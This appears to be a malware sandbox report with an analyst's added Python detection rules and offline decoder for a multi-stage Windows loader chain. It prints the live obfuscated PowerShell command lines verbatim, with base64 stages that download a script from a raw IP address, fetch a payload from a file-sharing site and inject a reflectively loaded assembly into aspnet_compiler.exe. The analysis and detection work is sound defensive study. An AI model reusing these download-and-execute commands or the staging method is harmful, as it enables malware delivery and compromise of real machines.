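    ProcessEvent(CMD, PS, "pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; "
                 "INvOke-ExpREsSioN($(INvoKe-EXpREssion('...fromBaSe64striNg(...)')))"),
    ProcessEvent(PS, CSC, '"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe" /noconfig /fullpaths '
                 '@"C:\\Users\\user\\AppData\\Local\\Temp\\r3q12jmu\\r3q12jmu.cmdline"'),
    ProcessEvent(PS, WSCRIPT, '"C:\\Windows\\System32\\WScript.exe" '
                 '"C:\\Users\\user\\AppData\\Roaming\\seethebestmagicalthignsgivegoodfo.vbS"'),
    ProcessEvent(WSCRIPT, PS, '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" $caviloso = \'...\';'
                 "$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));"
                 "Invoke-Expression $bernarda"),
    ProcessEvent(PS, ASPNET, '"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\aspnet_compiler.exe"'),
]

OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}                   # assumed set
SCRIPT_HOSTS = {"mshta.exe", "cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}
DOTNET_HOSTS = {"aspnet_compiler.exe", "regasm.exe", "regsvcs.exe", "installutil.exe"}  # assumed set
CANONICAL = {"powershell": "PowerShell", "bypass": "Bypass",
             "invoke-expression": "Invoke-Expression", "frombase64string": "FromBase64String"}
_KEYWORDS = re.compile("|".join(CANONICAL), re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def odd_case_tokens(cmdline):
    """Keywords written in neither all-lower, all-upper nor their documented casing."""
    return [t for t in _KEYWORDS.findall(cmdline)
            if t not in (t.lower(), t.upper(), CANONICAL[t.lower()])]


RULES = {
    "office_child_process": lambda e: basename(e.parent) in OFFICE and basename(e.image) in SCRIPT_HOSTS,
    "mshta_child_process": lambda e: basename(e.parent) == "mshta.exe"
        and basename(e.image) in {"cmd.exe", "powershell.exe"},
    "powershell_case_anomaly": lambda e: basename(e.image) in {"cmd.exe", "powershell.exe"}
        and bool(odd_case_tokens(e.cmdline)),
    "base64_invoke_expression": lambda e: "frombase64string" in e.cmdline.lower()
        and ("invoke-expression" in e.cmdline.lower() or re.search(r"\biex\b", e.cmdline, re.I) is not None),
    "powershell_compiles_csharp": lambda e: basename(e.parent) == "powershell.exe"
        and basename(e.image) == "csc.exe" and ".cmdline" in e.cmdline.lower(),
    "wscript_spawns_powershell": lambda e: basename(e.parent) in {"wscript.exe", "cscript.exe"}
        and basename(e.image) == "powershell.exe",
    # A .NET utility started by PowerShell with nothing but its own path is a hollowing host, not a build step.
    "powershell_spawns_bare_dotnet_host": lambda e: basename(e.parent) == "powershell.exe"
        and basename(e.image) in DOTNET_HOSTS
        and e.cmdline.strip().strip('"').lower().endswith(basename(e.image)),
}


def evaluate(events):
    """Return (event index, rule name) for every rule that fires on every event."""
    return [(i, name) for i, e in enumerate(events) for name, rule in RULES.items() if rule(e)]


if __name__ == "__main__":
    for i, name in evaluate(EVENTS):
        print(f"{i}: {basename(EVENTS[i].parent)} -> {basename(EVENTS[i].image)}: {name}")
```

The case rule deliberately accepts all-lower, all-upper and the documented spelling, so the second PowerShell (which writes `FromBase64String` and `Invoke-Expression` normally) trips only the base64 rule, while the cmd.exe and first powershell.exe command lines trip both; the bare-host rule keys on the empty argument list, which is what separates this aspnet_compiler.exe launch from a legitimate precompilation.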
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'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'+[CHaR]0X22+'))')))" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'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'+[CHaR]0X22+'))')))" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.cmdline" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC5BF.tmp" "c:\Users\user\AppData\Local\Temp\r3q12jmu\CSC7CCBE632744241EDA0AD204CE9F5FD7D.TMP" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = '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';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'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'+[CHaR]0X22+'))')))" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1610.tmp" "c:\Users\user\AppData\Local\Temp\xmqw35tj\CSCD4982987C63C4803AF625DBF77F42E41.TMP" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
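Two of the command lines above carry the next stages inline. The mshta -> cmd -> powershell one-liner hides its script by splitting `[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("..."))` into single-quoted fragments joined with `[char]58` (`:`) and `[char]34` (`"`), evaluating that string with Invoke-Expression and then evaluating the result; the token `DEVICEcReDenTialDePlOYMeNt` in front of it is not a cmdlet, which is consistent with the CommandNotFoundException fragments in the console writes above. The wscript -> powershell command simply base64-decodes `$caviloso`. The added example below is not code from the report or from the sample: it reproduces both decodings offline on the exact base64 arguments recorded above, pulls out the download URL and drop path of stage 1, and for stage 2 recovers the markers used to carve the payload out of the downloaded text, the reversed URL passed to the loader and the name of the process it targets. `carve_payload` re-implements the stage-2 slice/reverse/decode on a constructed hosted text, since the real download is not part of the report. The regex names and helper functions are my own.

```python
import base64
import re

# Both command lines are copied verbatim from the process-creation lines of this
# report; only the line breaks in the Python literals are mine.
STAGE1_B64 = "JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi"
STAGE1_CMDLINE = (
    # "DEVICEcReDenTialDePlOYMeNt" is not a cmdlet; it only produces the
    # CommandNotFoundException seen in the console writes.
    "pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; "
    "INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58"
    "+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34"
    "+'" + STAGE1_B64 + "'+[CHaR]0X22+'))')))"
)
STAGE2_B64 = "JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw=="
STAGE2_CMDLINE = (
    "$caviloso = '" + STAGE2_B64 + "';$bernarda = [System.Text.Encoding]::UTF8.GetString("
    "[System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda"
)

_TOKEN = re.compile(r"'((?:[^']|'')*)'|\[char\]\s*(0x[0-9a-f]+|\d+)", re.I)
_B64_CALL = re.compile(r"FromBase64String\(\s*(\"[^\"]+\"|'[^']+'|\$\w+)\s*\)", re.I)
_ASSIGN = re.compile(r"\$(\w+)\s*=\s*'([^']*)'")
_URLDL = re.compile(r"URLDownloadToFile\(\s*0\s*,\s*\"([^\"]+)\"\s*,\s*\"([^\"]+)\"", re.I)


def resolve_char_concat(cmdline):
    """Rebuild the string the inner Invoke-Expression receives: every single-quoted
    literal and every [char]N token, in order, joined as PowerShell's '+' would."""
    parts = []
    for m in _TOKEN.finditer(cmdline):
        if m.group(2) is not None:
            code = m.group(2)
            parts.append(chr(int(code, 16) if code.lower().startswith("0x") else int(code)))
        else:
            parts.append(m.group(1).replace("''", "'"))
    return "".join(parts)


def decode_base64_stage(script):
    """Decode the argument of the first FromBase64String call, whether it is an inline
    literal (stage 1) or a variable assigned a literal earlier in the script (stage 2)."""
    m = _B64_CALL.search(script)
    if m is None:
        raise ValueError("no FromBase64String call found")
    arg = m.group(1)
    blob = dict(_ASSIGN.findall(script))[arg[1:]] if arg.startswith("$") else arg[1:-1]
    blob = re.sub(r"\s+", "", blob)
    blob += "=" * (-len(blob) % 4)          # tolerate stripped padding
    return base64.b64decode(blob).decode("utf-8")


def stage1_download(script):
    """(URL, destination path) of the URLDownloadToFile call made through Add-Type."""
    m = _URLDL.search(script)
    if m is None:
        raise ValueError("no URLDownloadToFile call found")
    return m.group(1), m.group(2)


def stage2_loader(script):
    """Download URL, payload markers, loader arguments and the reversed C2 URL of stage 2."""
    variables = dict(_ASSIGN.findall(script))
    m = re.search(r"\.Invoke\(\$null,\s*@\((.*?)\)\)", script)
    args = re.findall(r"'([^']*)'", m.group(1))
    return {
        "download_url": variables["idioelectricidade"].strip(),
        "markers": (variables["intermiar"], variables["copiosamente"]),
        "c2_url": args[0][::-1],      # first VAI argument is the URL written backwards
        "host_process": args[4],      # name of the process the loader injects into
        "vai_args": args,
    }


def carve_payload(text, start_marker, end_marker):
    """Re-implementation of the stage-2 extraction: take the text between the markers,
    reverse it (the payload is stored as reversed base64) and decode it."""
    start = text.index(start_marker) + len(start_marker)
    end = text.index(end_marker)
    # The script evaluates "$trasladar -ge 0 -and $respondona -gt $trasladar" without
    # acting on it (it only prints True); here the check is enforced.
    if end < start:
        raise ValueError("end marker precedes start marker")
    return base64.b64decode(text[start:end][::-1])


# Constructed stand-in for the hosted text file; the real download is not in the report.
SAMPLE_ASSEMBLY = b"MZ\x90\x00" + b"constructed stand-in, not a real .NET assembly"
SAMPLE_HOSTED_TEXT = (
    "decoy text before the payload\n<<BASE64_START>>"
    + base64.b64encode(SAMPLE_ASSEMBLY).decode()[::-1]
    + "<<BASE64_END>>\ndecoy text after"
)

if __name__ == "__main__":
    stage1 = decode_base64_stage(resolve_char_concat(STAGE1_CMDLINE))
    print("stage 1 downloads", *stage1_download(stage1))
    info = stage2_loader(decode_base64_stage(STAGE2_CMDLINE))
    print("stage 2 fetches", info["download_url"])
    print("loader C2", info["c2_url"], "into", info["host_process"])
    print("carved", carve_payload(SAMPLE_HOSTED_TEXT, *info["markers"])[:4])
```

Decoded, stage 1 is an Add-Type P/Invoke of urlmon!URLDownloadToFile that fetches the .tIF from 146.70.113.200, writes it to %APPDATA% as the .vbS seen in the wscript.exe launch and runs it with `Ii` (Invoke-Item) after a three-second sleep; stage 2 downloads a text file from filemail.com, carves the reversed base64 between `<<BASE64_START>>` and `<<BASE64_END>>`, loads the result with `[System.Reflection.Assembly]::Load` and calls `[dnlib.IO.Home]::VAI` with a reversed URL on the same host and `aspnet_compiler` as the target process name, which matches the bare aspnet_compiler.exe launch above. Padding is re-added before decoding because .NET rejects unpadded input while analysts often meet blobs trimmed by logging.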
Source: C:\Windows\System32\mshta.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: credssp.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: d2d1.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: d3d10warp.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: winbrand.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
